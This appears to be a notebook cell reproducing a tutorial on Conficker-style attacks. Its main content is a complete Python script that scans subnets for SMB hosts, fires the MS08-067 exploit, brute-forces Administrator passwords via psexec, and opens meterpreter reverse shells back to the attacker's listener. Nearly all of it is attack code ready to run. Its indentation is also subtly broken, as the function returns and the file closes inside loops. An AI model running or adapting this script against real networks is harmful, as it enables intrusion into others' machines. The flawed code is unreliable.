In [3]:
## To simplify our attack we will utilize the Metasploit Framework, available for down- 
## load from: http://metasploit.com/download/. The open source computer security 
## project, Metasploit, has risen to quick popularity to become the de facto 
## exploitation toolkit over the last eight years. Championed and developed by the leg- 
## endary exploit writer, HD Moore, Metasploit allows penetration testers to launch 
## thousands of different computer exploits from a standardized and scriptable envi- 
## ronment. Shortly after the release of the vulnerability included in the Conficker 
## worm, HD Moore integrated a working exploit into the framework—ms08- 
## 067_ne-tapi.

## To utilize Metasploit’s attack, we first chose our exploit (exploit/windows/smb/ 
## ms08_067_ne-tapi) and then set the target to 192.168.1.37. Following target selec- 
## tion, we indicated the payload as windows/meterpreter/reverse_tcp and selected a 
## reverse connection to our host at 192.168.77.77 on port 7777. Finally, we told 
## Metasploit to exploit the system. Saving the configuration file to the filename con- 
## ficker.rc, we can now launch our attack by issuing the command msfconsole –r 
## conficker.rc. This command will tell Metasploit to launch with the conficker.rc con- 
## figuration file. When successful, our attack returns a Windows command shell to 
## control the machine.

## use exploit/windows/smb/ms08_067_netapi 
## set RHOST 192.168.1.37 
## set PAYLOAD windows/meterpreter/reverse_tcp 
## set LHOST 192.168.77.77 
## set LPORT 7777 
## exploit –j –z


## First, lets use the Nmap-Python module from our previous portscanner example.

## Here, the function findTgts,() takes an input of potential target hosts and returns 
## all the hosts that have TCP port 445 open. TCP port 445 serves as a primary port 
## for the SMB protocol. By filtering only the hosts that have a TCP port 445 open, our 
## attack script can now target only valid ones. This will eliminate hosts that would 
## ordinarily block our connection attempt. The function iterates through all hosts in 
## the scan. If the function finds a host with a TCP open, it appends that host to an 
## array. After completing the iteration, the function returns this array, containing all 
## the hosts with TCP port 445 open.


## While attackers have successfully launched the ms08_067_netapi exploit against 
## victims around the world, a defender can easily prevent it with current security 
## patches. Thus, the script will require the second attack vector used in the Conficker 
## Worm. It will need to brute force through SMB username/password combinations 
## attempting to gain access to remotely executed processes on the host (psexec). 
## The function smbBrute takes the Metasploit configuration file, the target host, a 
## second file containing a list of passwords, and the local address and port for the
## listener. It sets the username as the default windows Administrator and then opens 
## the password file. For each password in the file, the function builds a Metasploit 
## resource configuration in order to use the remote process execution (psexec) ex- 
## ploit. If a username/password combination succeeds, the exploit launches the 
## Meterpreter payload back to the local address and port.

## Tying this back all together, the script now has the ability to scan for possible tar- 
## gets and exploit them using the MS08_067 vulnerability and/or brute force 
## through a list of passwords to remotely execute processes. Finally, we will add 
## some option parsing back to the main() function of the script and then call the pre- 
## vious written functions as required to wrap up the entire script. The complete 
## script follows.


import os 
import optparse 
import sys 
import nmap 
def findTgts(subNet): 
  nmScan = nmap.PortScanner() 
  nmScan.scan(subNet, '445') 
  tgtHosts = []
  for host in nmScan.all_hosts(): 
   if nmScan[host].has_tcp(445): 
    state = nmScan[host]['tcp'][445]['state'] 
    if state == 'open': 
     print('[+] Found Target Host: ' + host) 
     tgtHosts.append(host) 
    return tgtHosts 
def setupHandler(configFile, lhost, lport): 
  configFile.write('use exploit/multi/handler\n') 
  configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp\n') 
  configFile.write('set LPORT ' + str(lport) + '\n') 
  configFile.write('set LHOST ' + lhost + '\n') 
  configFile.write('exploit -j -z\n') 
  configFile.write('setg DisablePayloadHandler 1\n') 
def confickerExploit(configFile, tgtHost, lhost, lport): 
  configFile.write('use exploit/windows/smb/ms08_067_netapi\n') 
  configFile.write('set RHOST ' + str(tgtHost) + '\n') 
  configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp\n') 
  configFile.write('set LPORT ' + str(lport) + '\n') 
  configFile.write('set LHOST ' + lhost + '\n') 
  configFile.write('exploit -j -z\n') 
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport): 
  username = 'Administrator' 
  pF = open(passwdFile, 'r') 
  for password in pF.readlines(): 
   password = password.strip('\n').strip('\r') 
   configFile.write('use exploit/windows/smb/psexec\n') 
   configFile.write('set SMBUser ' + str(username) + '\n') 
   configFile.write('set SMBPass ' + str(password) + '\n') 
   configFile.write('set RHOST ' + str(tgtHost) + '\n') 
   configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp\n') 
   configFile.write('set LPORT ' + str(lport) + '\n') 
   configFile.write('set LHOST ' + lhost + '\n')
   configFile.write('exploit -j -z\n') 
def main(): 
  configFile = open('meta.rc', 'w') 
  parser = optparse.OptionParser('[-] Usage%prog '+ '-H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]') 
  parser.add_option('-H', dest='tgtHost', type='string', help='specify the target address[es]') 
  parser.add_option('-p', dest='lport', type='string', help='specify the listen port') 
  parser.add_option('-l', dest='lhost', type='string', help='specify the listen address') 
  parser.add_option('-F', dest='passwdFile', type='string', help='password file for SMB brute force attempt') 
  (options, args) = parser.parse_args() 
  if (options.tgtHost == None) | (options.lhost == None): 
   print(parser.usage) 
   exit(0) 
  lhost = options.lhost 
  lport = options.lport 
  if lport == None: 
   lport = '1337' 
  passwdFile = options.passwdFile 
  tgtHosts = findTgts(options.tgtHost) 
  setupHandler(configFile, lhost, lport) 
  for tgtHost in tgtHosts: 
   confickerExploit(configFile, tgtHost, lhost, lport) 
   if passwdFile != None: 
    smbBrute(configFile, tgtHost, passwdFile, lhost, lport) 
    configFile.close() 
    os.system('msfconsole -r meta.rc') 
if __name__ == '__main__': 
  main()


ModuleNotFoundError: ignored